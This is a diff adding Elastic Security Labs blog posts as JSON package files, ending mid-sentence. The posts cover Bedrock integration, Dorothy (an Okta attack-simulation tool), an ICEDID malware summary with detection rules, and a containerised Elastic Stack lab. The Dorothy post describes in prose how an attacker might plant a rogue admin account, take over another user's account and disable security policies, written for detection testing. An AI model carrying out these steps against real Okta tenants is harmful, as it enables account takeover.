that would generate detection alerts in Elastic Security. When analyzing these alerts using the Elastic Attack Discovery feature, the script creates attack chains that show the relationships between various alerts, giving analysts a clear understanding of how multiple alerts might be part of a larger attack.\n\n\n\n# Conclusion\n\nIntegrating Elastic with Amazon Bedrock empowers organizations to maintain a secure and compliant cloud environment while maximizing the benefits of AI and machine learning. By leveraging Elastic’s advanced security and observability tools, businesses can proactively detect threats, automate compliance reporting, and gain deeper insights into their cloud operations. Increasingly, enterprises rely on opaque data sources and technologies to reveal the most serious threats-- our commitment to transparent security is evident in our open artifacts, integrations, and source code."
+ },
+ "title": "Streamlining Security: Integrating Amazon Bedrock with Elastic",
+ "slug": "streamlining-security-integrating-amazon-bedrock",
+ "date": "2024-11-14",
+ "description": "This article will guide you through the process of setting up the Amazon Bedrock integration and enabling Elastic's prebuilt detection rules to streamline your security operations.",
+ "author": [
+ {
+ "slug": "shashank-k-s"
+ }
+ ],
+ "image": "Security Labs Images 36.jpg",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ]
+ },
+ "id": "security_labs_content-streamlining_security_integrating_amazon_bedrock-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-testing_okta_visibility_and_detection_dorothy-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-testing_okta_visibility_and_detection_dorothy-md.json
new file mode 100644
index 00000000000..aff9058ab7b
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-testing_okta_visibility_and_detection_dorothy-md.json
@@ -0,0 +1,24 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Testing your Okta visibility and detection with Dorothy and Elastic Security\"\nslug: \"testing-okta-visibility-and-detection-dorothy\"\ndate: \"2022-06-02\"\ndescription: \"Dorothy is a tool for security teams to test their visibility and detection capabilities for their Okta environment. IAM solutions are frequently targeted by adversaries but poorly monitored. Learn how to get started with Dorothy in this post.\"\nauthor:\n - slug: david-french\nimage: \"blog-thumb-dorothy-cow.jpg\"\ncategory:\n - slug: security-research\n---\n\nWhen approached by stakeholders in their organization, few security teams can confidently demonstrate that logging and alerting capabilities are working as expected. Organizations have become more distributed and reliant on cloud offerings for use cases such as identity and access management, user productivity, and file storage. Meanwhile, adversaries have extended their operational capabilities in cloud environments. It is crucial that security teams are able to monitor these systems for abuse in order to protect their organization’s data from attack.\n\n[Dorothy](https://github.com/elastic/dorothy) is a free and open tool to help security teams test their visibility, monitoring, and detection capabilities for Okta Single Sign-On (SSO) environments. We’ll demonstrate how Dorothy can be used to execute tests and how [Elastic Security](https://www.elastic.co/security) can be used to alert on relevant and suspicious behavior using our [free and open detection rules](https://github.com/elastic/detection-rules/).\n\n## What is Okta SSO?\n\nFor those who aren’t familiar, [Okta SSO](https://www.okta.com/products/single-sign-on/) is a cloud-based identity management solution that allows users to authenticate to a variety of systems and applications within their organization using a single user account. Informing end users that they only have to remember _one_ username and password instead of ten or more reduces the risk that they’ll develop poor password hygiene and enables system administrators to enforce stronger password policies. Further, multi-factor authentication (MFA) policies can be configured in Okta, which raises the barrier to entry for attackers. Many attackers will simply move on and look for an easier target when they discover that MFA is enforced in their target’s network or user account.\n\nWhile SSO solutions can provide a convenient user experience and reduce cybersecurity risk for an organization, these centralized systems offer a type of skeleton key to many systems and applications, and are often an attractive target for attackers. It’s critical that security teams understand what normal behavior looks like in their Okta environment so that they can identify suspicious activity more easily.\n\n## Meet Dorothy\n\n[Dorothy](https://github.com/elastic/dorothy) has 25+ modules to simulate actions an attacker may take while operating in an Okta environment and behavior that security teams should monitor for, detect, and alert on. All modules are mapped to the relevant [MITRE ATT&CK®](https://attack.mitre.org/) tactics, such as Persistence, Defense Evasion, Discovery, and Impact.\n\n\n\nDorothy was created to help defenders test their security visibility and controls, and does not provide any modules to obtain initial access or escalate privileges in an Okta environment. To execute actions using Dorothy, a valid Okta API token is required that is linked to a user with one or more administrator roles assigned.\n\nA user-friendly shell interface with contextual help is provided for navigation between menus and modules, helping guide the user through simulated intruder scenarios. Other features include configuration profiles to manage connections to individual Okta environments and detailed logging with the option of indexing events into Elasticsearch to provide an audit trail of the actions that were executed using Dorothy.\n\n## Executing actions in an Okta environment using Dorothy\n\nIn this section, we demonstrate how to execute some of Dorothy’s modules in an Okta environment. Figure 2 below shows the typical workflow for an Elastic Security user. After this demonstration, you should be comfortable with heading over to Dorothy’s GitHub repository and following the “Getting Started” steps in the project’s [wiki](https://github.com/elastic/dorothy/wiki).\n\n\n\n### whoami?\n\nLet’s put ourselves in an attacker's shoes and think about what actions they might take while operating in an Okta environment. As an attacker with an initial foothold, the first questions I'll have are about the user for which I have an API token. Let's simulate this attacker action through Dorothy's whoami command to look at the associated user’s login ID, last login time, and last password change.\n\nNow that we have a better understanding of the user account we have control of, we’ll list Dorothy’s modules and check out the help menu before making our next move.\n\n\n\n_Figure 3 - Executing Dorothy’s whoami and list-modules commands_\n\n### Discovery\n\nDorothy has several discovery modules we can use to simulate the knowledge an attacker might obtain about an Okta environment. Adversaries will often spend time to learn details of an environment after obtaining initial access — details that are essential for orienting themselves before planning their next steps.\n\nLet’s try and gain some knowledge about the Okta environment by harvesting the following information:\n\n- Users - A list of names, login IDs, email addresses, password recovery questions, and the status of each user will be useful when choosing which accounts to take control of, modify, or leave intact to avoid detection\n- Policies - [Okta policies](https://help.okta.com/en/prod/Content/Topics/Security/Security_Policies.htm) are used to control elements of security, including password complexity and MFA requirements, as well as the devices that users are permitted to use. This knowledge will come in handy if we decide to weaken some components of the target’s security configuration\n- Zones - [Network zones](https://help.okta.com/en/prod/Content/Topics/Security/network/network-zones.htm) can be used to define security perimeters for an Okta environment. Similar to policies, this information helps us learn how the environment is configured and make informed decisions before implementing any changes on how traffic is allowed or blocked\n\nFinally, we’ll execute the find-admins module to enumerate the roles of each Okta user and identify which users have one or more administrator roles assigned to them.\n\n\n\n_Figure 4 - Executing Dorothy’s “discovery” modules to gain knowledge about the Okta environment_\n\nOther discovery modules to help with information gathering tasks include find-users-without-mfa to find users who may authenticate using only a username and password and find-admin-groups to identify user groups that have one or more administrator roles assigned to them.\n\n### Persistence\n\nOnce an attacker has obtained access to their target environment, they may look for opportunities to establish persistence. Persistence helps an attacker maintain access in the event that they lose their initial foothold. A common example of how an adversary might lose their access is when the security team detects their presence and disables the compromised user account that the attacker is utilizing or blocks their communications at the network perimeter.\n\nHaving one or more persistence mechanisms in place means that the attacker will be able to continue their mission if one of their pathways is blocked or interrupted. In this example, we’ll use Dorothy's create-user and create-admin-user modules to create an Okta user and [assign an administrator role](https://github.com/elastic/detection-rules/blob/main/rules/okta/persistence_administrator_role_assigned_to_okta_user.toml) to the new user. Next, we'll create a recovery question for another Okta user so that we can go through the process of resetting the password for that user and take control of their account as another method of persistence.\n\n\n\nDorothy has other persistence modules to help us understand the steps an attacker might take, such as reset-factors to [remove a user's enrolled authentication factors](https://github.com/elastic/detection-rules/blob/main/rules/okta/persistence_attempt_to_reset_mfa_factors_for_okta_user_account.toml) and reset-password to generate a one-time link to reset a user's password.\n\n### Defense Evasion\n\nAdversaries will attempt to execute defense evasion techniques to avoid detection throughout their mission. For example, an attacker may attempt to disable security logging to render the security team blind to their nefarious actions.\n\nAt this point, we’ve gained knowledge about the environment and configured a couple of forms of persistence. Let’s execute Dorothy's [change-policy-state](https://github.com/elastic/detection-rules/blob/main/rules/okta/okta_attempt_to_deactivate_okta_policy.toml) and [change-zone-state](https://github.com/elastic/detection-rules/blob/main/rules/okta/attempt_to_deactivate_okta_network_zone.toml) modules to weaken the “target's” security controls.\n\n\n\n_Figure 6 - Deactivating Okta policy and network zone objects_\n\nOther defense evasion-themed modules can activate, deactivate, or modify other Okta objects such as applications and individual policy rules.\n\nWe’ll stop our fictitious attack scenario here, but if you’re curious to learn what else Dorothy can do, head over to the [GitHub repository](https://github.com/elastic/dorothy).\n\n## Detecting suspicious behavior with Elastic Security\n\nIn this section, we'll demonstrate how Okta's [system log](https://help.okta.com/en/prod/Content/Topics/Reports/Reports_SysLog.htm) powers our free detection rules to monitor for and alert teams to suspicious behavior.\n\nOkta's system log provides an audit trail of activity that was observed in an organization's environment. This includes activity such as users logging in or changing their password, administrators making configuration changes, and much more. This data source is incredibly useful for security monitoring, investigations, compliance, and response activities.\n\n### Ingesting Okta system logs with Fleet\n\n[Fleet](https://www.elastic.co/guide/en/fleet/current/fleet-overview.html) provides a web-based UI in Kibana to add and manage integrations for popular services and platforms including Okta, AWS, Azure, Google Cloud Platform, Google Workspace, and many others. Fleet’s Okta integration provides an easy way to ingest and normalize Okta’s system log events.\n\n\n\nAn [Okta Filebeat module](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-okta.html) is also available for teams that already use Beats.\n\n### Detecting suspicious behavior with Elastic Security’s free detection rules\n\nThe Elastic Security Protections Team researches adversary tradecraft in order to develop detections and preventions for endpoint, cloud, and network platforms. Our [detection rules](https://github.com/elastic/detection-rules) are free and developed in the open alongside the broader security community.\n\nOur Okta rules utilize the indexed system log events that are normalized into [Elastic Common Schema (ECS)](https://www.elastic.co/guide/en/ecs/current/ecs-reference.html) and alert security teams to relevant and suspicious behavior.\n\nFigure 8 below shows a number of alerts in Elastic Security after Dorothy was used to simulate actions that an attacker might take while operating in an Okta environment.\n\n\n\nWhat about those pesky false positives? Adding exceptions to rules in Elastic Security to filter routine and expected behavior is straightforward. This feature includes an option to close all alerts that match the exception to save you time.\n\n\n\n## Measure your cloud cover with Dorothy\n\nOkta and other identity management solutions are frequently targeted by adversaries, but are often poorly monitored, if at all. We created Dorothy as a tool to help security teams understand how adversaries can operate within Okta environments, further empowering them to test their visibility and efficacy of our free and open detection rules.\n\nYou can learn how to get started with Dorothy by visiting the project’s [wiki](https://github.com/elastic/dorothy/wiki). If you're not already an Elastic Security user, you can sign up for a [free cloud trial](https://www.elastic.co/cloud/) today and check out our free [detection rules](https://www.elastic.co/blog/elastic-security-opens-public-detection-rules-repo).\n"
+ },
+ "title": "Testing your Okta visibility and detection with Dorothy and Elastic Security",
+ "slug": "testing-okta-visibility-and-detection-dorothy",
+ "date": "2022-06-02",
+ "description": "Dorothy is a tool for security teams to test their visibility and detection capabilities for their Okta environment. IAM solutions are frequently targeted by adversaries but poorly monitored. Learn how to get started with Dorothy in this post.",
+ "author": [
+ {
+ "slug": "david-french"
+ }
+ ],
+ "image": "blog-thumb-dorothy-cow.jpg",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ]
+ },
+ "id": "security_labs_content-testing_okta_visibility_and_detection_dorothy-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-thawing_the_permafrost_of_icedid_summary-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-thawing_the_permafrost_of_icedid_summary-md.json
new file mode 100644
index 00000000000..40ccc19af00
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-thawing_the_permafrost_of_icedid_summary-md.json
@@ -0,0 +1,32 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Thawing the permafrost of ICEDID Summary\"\nslug: \"thawing-the-permafrost-of-icedid-summary\"\ndate: \"2023-03-21\"\nsubtitle: \"Elastic Security Labs details a recent ICEDID GZip variant\"\ndescription: \"Elastic Security Labs analyzed a recent ICEDID variant consisting of a loader and bot payload. By providing this research to the community end-to-end, we hope to raise awareness of the ICEDID execution chain, capabilities, and design.\"\nauthor:\n - slug: cyril-francois\n - slug: daniel-stepanic\nimage: \"blog-thumb-tree-icicles.jpg\"\ncategory:\n - slug: malware-analysis\ntags:\n - malware analysis\n - icedid\n---\n\nICEDID is a malware family first [described](https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/) in 2017 by IBM X-force researchers and is associated with the theft of login credentials, banking information, and other personal information. ICEDID has always been a prevalent family, but has achieved even more growth since EMOTET’s temporary [disruption](https://www.justice.gov/opa/pr/emotet-botnet-disrupted-international-cyber-operation) in early 2021. ICEDID has been linked to the distribution of other distinct malware families including [DarkVNC](https://malpedia.caad.fkie.fraunhofer.de/details/win.darkvnc) and [COBALT STRIKE](https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot). Regular industry reporting, including research publications like this one, help mitigate this threat.\n\nElastic Security Labs analyzed a recent ICEDID variant consisting of a loader and bot payload. By providing this research to the community end-to-end, we hope to raise awareness of the ICEDID execution chain, highlight its capabilities, and deliver insights about how it is designed.\n\n### Execution Chain\n\nICEDID employs multiple stages before establishing persistence via a scheduled task and may retrieve components from C2 dynamically. The following diagram illustrates major phases of the ICEDID execution chain.\n\n\n\n### Research Paper Overview\n\nElastic Security Labs described the full execution chain of a recent ICEDID sample in a detailed research [paper](https://www.elastic.co/pdf/elastic-security-labs-thawing-the-permafrost-of-icedid.pdf) hosted at Elastic Security Labs. In addition, we provide a comprehensive analysis of this malware sample and capabilities, including: - Virtualization detection and anti-analysis - C2 polling operations - Shellcode execution methods - Credential access mechanisms - Websocket connections - Installing a web browser proxy to capture all user traffic - Reverse shell and VNC server installation - Certificate pinning - Data validation - ICEDID observable TTPs - Links to useful resources from Elastic\n\n### Detections and preventions\n\n#### Detection logic\n\n- [Enumeration of Administrator Accounts](https://www.elastic.co/guide/en/security/current/enumeration-of-administrator-accounts.html)\n- [Command Shell Activity Started via RunDLL32](https://www.elastic.co/guide/en/security/current/command-shell-activity-started-via-rundll32.html)\n- [Security Software Discovery using WMIC](https://www.elastic.co/guide/en/security/current/security-software-discovery-using-wmic.html)\n- [Suspicious Execution from a Mounted Device](https://www.elastic.co/guide/en/security/current/suspicious-execution-from-a-mounted-device.html)\n- [Windows Network Enumeration](https://www.elastic.co/guide/en/security/current/windows-network-enumeration.html)\n- [Unusual DLL Extension Loaded by Rundll32 or Regsvr32](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_unusual_dll_extension_loaded_by_rundll32_or_regsvr32.toml)\n- [Suspicious Windows Script Interpreter Child Process](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_suspicious_windows_script_interpreter_child_process.toml)\n- [RunDLL32 with Unusual Arguments](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_rundll32_with_unusual_arguments.toml)\n\n#### Preventions (source: [https://github.com/elastic/protections-artifacts/](https://github.com/elastic/protections-artifacts/))\n\n- Malicious Behavior Detection Alert: Command Shell Activity\n- Memory Threat Detection Alert: Shellcode Injection\n- Malicious Behavior Detection Alert: Unusual DLL Extension Loaded by Rundll32 or Regsvr32\n- Malicious Behavior Detection Alert: Suspicious Windows Script Interpreter Child Process\n- Malicious Behavior Detection Alert: RunDLL32 with Unusual Arguments\n- Malicious Behavior Detection Alert: Windows Script Execution from Archive File\n\n#### YARA\n\nElastic Security has created multiple YARA rules related to the different stages/components within ICEDID infection, these can be found in the signature linked below: - [Windows.Trojan.ICEDID](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_IcedID.yar)\n\n---\n\nElastic Security Labs is a team of dedicated researchers and security engineers focused on disrupting adversaries though the publication of detailed detection logic, protections, and applied threat research.\n\nFollow us on @elasticseclabs or visit our research portal for more resources and research.\n"
+ },
+ "title": "Thawing the permafrost of ICEDID Summary",
+ "slug": "thawing-the-permafrost-of-icedid-summary",
+ "subtitle": "Elastic Security Labs details a recent ICEDID GZip variant",
+ "date": "2023-03-21",
+ "description": "Elastic Security Labs analyzed a recent ICEDID variant consisting of a loader and bot payload. By providing this research to the community end-to-end, we hope to raise awareness of the ICEDID execution chain, capabilities, and design.",
+ "author": [
+ {
+ "slug": "cyril-francois"
+ },
+ {
+ "slug": "daniel-stepanic"
+ }
+ ],
+ "image": "blog-thumb-tree-icicles.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "malware analysis",
+ "icedid"
+ ]
+ },
+ "id": "security_labs_content-thawing_the_permafrost_of_icedid_summary-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-the_elastic_container_project-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-the_elastic_container_project-md.json
new file mode 100644
index 00000000000..3a98ee9e5a9
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-the_elastic_container_project-md.json
@@ -0,0 +1,34 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"The Elastic Container Project for Security Research\"\nslug: \"the-elastic-container-project\"\ndate: \"2023-03-01\"\nsubtitle: \"Using Docker to stand up the Elastic Stack\"\ndescription: \"The Elastic Container Project provides a single shell script that will allow you to stand up and manage an entire Elastic Stack using Docker. This open source project enables rapid deployment for testing use cases.\"\nauthor:\n - slug: andrew-pease\n - slug: colson-wilhoit\n - slug: derek-ditch\nimage: \"blog-thumb-container-barge.jpg\"\ncategory:\n - slug: security-operations\n - slug: detection-science\n---\n\n## Preamble\n\nThe Elastic Stack is a modular data analysis ecosystem. While this allows for engineering flexibility, it can be cumbersome to stand up a development instance for testing. The easiest way to stand up the Elastic Stack, is to use [Elastic Cloud](https://cloud.elastic.co) - it’s completely turnkey. However, there could be situations where Elastic Cloud won’t work for your testing environment. To help with this, this blog will provide you with the necessary information required in order to quickly and painlessly stand up a local, fully containerized, TLS-secured, Elastic Stack with Fleet and the Detection Engine enabled. You will be able to create a Fleet policy, install an Elastic Agent on a local host or VM, and send the data into your stack for monitoring or analysis.\n\nThis blog will cover the following:\n\n- The Elastic Stack\n- The Elastic Container project\n- How to use the Elastic Container project\n- How to navigate Kibana and use its related features for security research\n\n> The Elastic Container Project is not sponsored or maintained by the company, Elastic. Design and implementation considerations for the project may not reflect Elastic’s guidance on deploying a production-ready stack.\n\n## The Elastic Stack\n\nThe Elastic Stack is made up of several different components, each of which provide a distinct capability that can be utilized across a wide variety of use cases.\n\n### Elasticsearch\n\nElasticsearch is a distributed, RESTful search and analytics engine. As the heart of the Elastic Stack, it centrally stores your data for lightning-fast search, fine-tuned relevancy, and powerful analytics that scale with ease.\n\n### Kibana\n\nKibana is the user interface that lets you visualize your Elasticsearch data and manage the Elastic Stack.\n\n### The Elastic Agent\n\nThe Elastic Agent is the modular agent that allows you to collect data from an endpoint or act as a vehicle to ship data from 3rd party sources, like threat feeds. The Elastic Security integration for endpoints prevents ransomware and malware, detects advanced threats, and arms responders with vital investigative context.\n\n## The Elastic Container Project\n\n\n\nAs mentioned above, the Elastic Stack is modular which makes it very flexible for a wide variety of use cases but this can add complexity to the implementation.\n\nThe Elastic Container project is an open source project that uses Docker Compose as a way to stand up a fully-functional Elastic Stack for use in non-production environments. This project is not sponsored or maintained by the Elastic company.\n\n### Introduction\n\nThe [Elastic Container Project](https://github.com/peasead/elastic-container) includes three main components:\n\n- Elasticsearch\n- Kibana\n- the Elastic Agent\n\nThe project leverages [Docker Compose](https://docs.docker.com/compose/), which is a tool to build, integrate, and manage multiple Docker containers.\n\nTo simplify the management of the containers, the project includes a shell script that allows for the staging, starting, stopping, and destroying of the containers.\n\nAdditionally, the project makes use of self-signed TLS certificates between Elasticsearch and Kibana, Kibana and your web browser, the Elastic Agent and Elasticsearch, and the Elastic Agent and Kibana.\n\n### Prerequisites\n\nThe project was built and tested on Linux and macOS operating systems. If you are using Windows, you’ll not be able to use the included shell script, but you can still run native Docker Compose commands and manually perform post-deployment steps.\n\nWhile not thoroughly tested, it is recommended that you contribute 4 cores and 8 GB of RAM to Docker.\n\nThere are only a few packages you need to install:\n\n- Docker\n- Docker Compose\n- jq\n- Git\n- cURL\n\n#### macOS\n\nIf you’re running on macOS, you can install the prerequisites using [Homebrew](https://brew.sh/), which is an open-source package management system for macOS. Check out the Homebrew site for information on installing it if needed.\n\n```\n**brew install jq git**\n**brew install --cask docker**\n```\n\n#### Linux\n\nIf you’re running on Linux, you can install the prerequisites using your package management system ( **DNF** , **Yum** , or **APT** ).\n\n**RPM-based distributions**\n\n```\n**dnf install jq git curl**\n```\n\n**Ubuntu**\n\n```\n**apt-get install jq git curl**\n```\n\nYou'll also need the Docker suite (including the **docker-compose-plugin** ). Check out Docker's [installation instructions](https://docs.docker.com/engine/install/) for your OS'\n\n### Cloning the project repository\n\nThe Elastic Container project is stored on Github. As long as you have Git installed, you can collect it from your CLI of choice.\n\n```\n**git clone https://github.com/peasead/elastic-container.git**\n**cd elastic-container**\n```\n\nThis repository includes everything needed to stand up the Elastic Stack containers using a single shell script.\n\n### Setting credentials\n\nBefore proceeding, ensure you update the credentials for the Elastic and Kibana accounts in the **.env** file located in the root directory of the repository from their defaults of **changeme**.\n\n### The shell script\n\nAs mentioned above, the project includes a shell script that will simplify the management of the containers.\n\n```\n**usage: ./elastic-container.sh [-v] (stage|start|stop|restart|status|help)**\n**actions:**\n **stage downloads all necessary images to local storage**\n **start creates network and starts containers**\n **stop stops running containers without removing them**\n **destroy stops and removes the containers, the network and volumes created**\n **restart simply restarts all the stack containers**\n **status check the status of the stack containers**\n **help print this message**\n **flags:**\n **-v enable verbose output**\n```\n\n#### Stage\n\nThis option downloads all of the containers from the Elastic Docker hub. This is useful if you are going to be building the project on a system that does not always have Internet access. This is not required, you can skip this option and move directly to the start option, which will download the containers.\n\n```\n**$ ./elastic-container.sh stage**\n**8.3.0: Pulling from elasticsearch/elasticsearch**\n**7aabcb84784a: Already exists**\n**e3f44495617d: Downloading [====\\\\>] 916.5kB/11.26MB**\n**52008db3f842: Download complete**\n**551b59c59fdc: Downloading [\\\\>] 527.4kB/366.9MB**\n**25ee26aa662e: Download complete**\n**7a85d02d9264: Download complete**\n**…**\n```\n\n#### Start\n\nThis opinion will create the container network, download all of the required containers, set up the TLS certificates, and start and connect Elasticsearch, Kibana, and the Fleet server containers together. This option is a “quick start” to get the Elastic Stack up and running. If you have not changed your credentials in the .env file from the defaults, the script will exit.\n\n```\n**$ ./elastic-container.sh start**\n\n**Starting Elastic Stack network and containers**\n**[+] Running 7/8**\n **⠿ Network elastic-container\\_default Created 0.0s**\n **⠿ Volume \"elastic-container\\_certs\" Created 0.0s**\n **⠿ Volume \"elastic-container\\_esdata01\" Created 0.0s**\n **⠿ Volume \"elastic-container\\_kibanadata\" Created 0.0s**\n **⠿ Container elasticsearch-security-setup Waiting 2.0s**\n **⠿ Container elasticsearch Created 0.0s**\n**…**\n```\n\n#### Stop\n\nThis option will stop all running containers in the project, but will not remove them.\n\n```\n**$ ./elastic-container.sh stop**\n\n**Stopping running containers.**\n**[+] Running 4/4**\n **⠿ Container elastic-agent Stopped 0.0s**\n **⠿ Container kibana Stopped 0.0s**\n **⠿ Container elasticsearch Stopped 0.0s**\n **⠿ Container elasticsearch-security-setup Stopped**\n**…**\n```\n\n#### Destroy\n\nThis option will stop all running containers in the project, remove the container network, remove all data volumes, and remove all containers.\n\n```\n**$ ./elastic-container.sh destroy**\n\n**#####**\n**Stopping and removing the containers, network, and volumes created.**\n**#####**\n**[+] Running 8/4**\n **⠿ Container elastic-agent Removed 0.0s**\n **⠿ Container kibana Removed 0.0s**\n **⠿ Container elasticsearch Removed 0.0s**\n **⠿ Container elasticsearch-security-setup Removed 0.3s**\n **⠿ Volume elastic-container\\_esdata01 Removed 0.0s**\n **⠿ Network elastic-container\\_default Removed 0.1s**\n**…**\n```\n\n#### Restart\n\nThis option restarts all of the project containers.\n\n```\n**$ ./elastic-container.sh restart\n\n#####\nRestarting all Elastic Stack components.\n#####\nName Command State Ports\n---------------------------\nelasticsearch /bin/tini -- /usr/local/bi ... Up (healthy) 0.0.0.0:9200-\\\\>9200/tcp, 9300/tcp\nfleet-server /usr/bin/tini -- /usr/loca ... Up 0.0.0.0:8220-\\\\>8220/tcp\nkibana /bin/tini -- /usr/local/bi ... Up (healthy) 0.0.0.0:5601-\\\\>5601/tcp**\n```\n\n#### Status\n\nThis option returns the status of the project containers.\n\n```\n**$ ./elastic-container.sh status**\n**Name Command State Ports**\n**---------------------------**\n**elasticsearch /bin/tini -- /usr/local/bi ... Up (healthy) 0.0.0.0:9200-\\\\>9200/tcp, 9300/tcp**\n**fleet-server /usr/bin/tini -- /usr/loca ... Up 0.0.0.0:8220-\\\\>8220/tcp**\n**kibana /bin/tini -- /usr/local/bi ... Up (healthy) 0.0.0.0:5601-\\\\>5601/tcp**\n```\n\n#### Clear\n\nThis option clears all documents in the logs and metrics indices.\n\n```\n**$ ./elastic-container.sh clear**\n\n**Successfully cleared logs data stream**\n**Successfully cleared metrics data stream**\n```\n\n#### Help\n\nThis option provides instructions on using the shell script.\n\n```\n**$ ./elastic-container.sh help**\n\n**usage: ./elastic-container.sh [-v] (stage|start|stop|restart|status|help)**\n**actions:**\n **stage downloads all necessary images to local storage**\n **start creates a container network and starts containers**\n **stop stops running containers without removing them**\n **destroy stops and removes the containers, the network and volumes created**\n **restart simply restarts all the stack containers**\n **status check the status of the stack containers**\n**clear all documents in logs and metrics indexes**\n **help print this message**\n**flags:**\n **-v enable verbose output**\n```\n\n## Getting Started\n\nNow that we’ve walked through the project overview and the shell script, let’s go through the process of standing up your own stack.\n\n### Updating variables\n\nAll of the variables are controlled in an environment file ( **.env** ) that is at the root of the repository. The only things that you must change are the default usernames and passwords for **elastic** and **kibana**.\n\nOpen the **.env** file with whatever text editor you’re most comfortable with and update the **ELASTIC_PASSWORD** and **KIBANA_PASSWORD** variables from **changeme** to something secure. If you do not update the credentials from the defaults in the **.env** file, the script will exit.\n\nIf you want to change the other variables (such as the stack version), you can do so in this file.\n\n### Starting the Elastic Stack\n\nStarting the project containers is as simple as running the **elastic-container.sh** shell script with the start option.\n\n```\n**$ ./elastic-container.sh start**\n\n**Starting Elastic Stack network and containers\n[+] Running 7/8\n⠿ Network elastic-container\\_default Created 0.0s\n⠿ Volume \"elastic-container\\_certs\" Created 0.0s\n⠿ Volume \"elastic-container\\_esdata01\" Created 0.0s\n⠿ Volume \"elastic-container\\_kibanadata\" Created 0.0s\n⠿ Container elasticsearch-security-setup Waiting 2.0s\n⠿ Container elasticsearch Created 0.0s\n⠿ Container kibana Created 0.1s\n⠿ Container fleet-server Created 0.2s\n\nAttempting to enable the Detection Engine and Prebuilt-Detection Rules\nKibana is up. Proceeding\nDetection engine enabled. Installing prepackaged rules.\nPrepackaged rules installed!\nWaiting 40 seconds for Fleet Server setup\nPopulating Fleet Settings\nREADY SET GO!\n\nBrowse to https://localhost:5601\nUsername: elastic\nPassphrase: you-changed-me-from-the-default-right?**\n```\n\n### Accessing the Elastic Stack\n\nOnce the containers have all downloaded and started, you’ll get an output that tells you to browse to **https://localhost:5601**.\n\n**Note:** You’ll need to accept the self-signed TLS certificate.\n\n## Enabling the Platinum Features\n\nEnabling the Platinum license features are completely optional. Security features, like anti-malware, EDR, EPP, etc. are included in the Basic license. Memory, behavior, and ransomware protections are Platinum license features. If you want to change your license, we can do that with the **.env** file or from within Kibana. You can update to Elastic Platinum for 30-days.\n\nIf you want to use the **.env** file so that the features are enabled when the stack is built, change **LICENSE=basic** to **LICENSE=trial** and then start the project as normal.\n\nIf you prefer to use Kibana, click on the hamburger menu, and then click on Stack Management.\n\n\n\nClick on License Management and then “Start a 30-day trial”.\n\n\n\n## Creating a Fleet policy\n\nNow that we have the entire Elastic Stack up and running, we can make a [Fleet](https://www.elastic.co/guide/en/kibana/current/fleet.html) policy. Fleet is a subroutine of an [Elastic Agent](https://www.elastic.co/elastic-agent) (which was built when we ran the **start** option in the shell script) that enables you to manage other Elastic Agents, policies, and integrations.\n\n> Fleet is managed in Kibana, the UI that allows you to interact with data stored in Elasticsearch and manage your Elastic stack. If you’re interested in learning more about Kibana, check out the [free](https://www.elastic.co/training/free#quick-starts) [training](https://www.elastic.co/training/free#how-to) [videos](https://www.elastic.co/training/free#fundamentals).\n\nLog into your Kibana instance and click on the “hamburger” menu on the top left, and navigate down to “Fleet”, under the “Management” section.\n\n\n\nNext, click on the “Agent policies” tab and then the “Create agent policy” button.\n\n\n\nGive your new policy a name and a description (optional). Normally, we uncheck the “Collect agent logs” and “Collect agent metrics” options because it’s additional data going to the stack that we generally don’t need for our specific use-case. If you’re doing troubleshooting or interested in what’s happening behind the scenes, this data can help you understand that.\n\n\n\nNext, click on your new policy and the blue “Add integration” button.\n\n\n\n\n\nThere are hundreds of integrations, but the ones that we’re most interested in for this blog are for Elastic Security.\n\nTo install Elastic Security, simply click on the tile on the main integrations page or search for “security”.\n\n\n\nNext, click the “Add Endpoint and Cloud Security” button to install this integration into the policy we just created.\n\n\n\nName the integration and click the blue “Save and continue” button.\n\n\n\n> While the Endpoint and Cloud Security and System integrations will collect security related logs, if you’re using Sysmon on a Windows host, you may want to add the “Windows” integration to collect those logs.\n\nOnce the integration is installed, you’ll be prompted to add more Agents or to do that later. Select the “Add Elastic Agent later” option so we can make a few more changes to our policy.\n\n\n\nNow we’ll be dropped back to our policy page.\n\nWe should have two integrations for our policy: **security** and **system-1**.\n\n\n\nBefore we add any agents, we’ll want to set our Elastic Agent to Detect (so that it allows the malware to completely execute), register the Elastic Agent as a trusted AV solution (Windows only), and instruct the Endpoint and Cloud Security integration to collect memory samples from security events. This is tremendously helpful for “fileless” malware that injects directly into memory, like Cobalt Strike.\n\n> If you want to learn more about extracting malware beacons from events generated by the Elastic Agent, check out our other [publications](https://www.elastic.co/security-labs/collecting-cobalt-strike-beacons-with-the-elastic-stack) and [repositories](https://github.com/elastic/malware-exquacker).\n\nTo allow the malware to continue to execute, on your “Windows” policy page, click on the name of the integration (“security” in our example), set the Protection level to “Detect”.\n\n\n\nRepeat these steps for the Ransomware, Memory threat protections, and Malicious behavior sections.\n\n> We’re setting the Elastic Agent to Detect so that the malware we’re detonating will run completely so that we can analyze the entire execution chain. If you want the malware to be stopped, you can 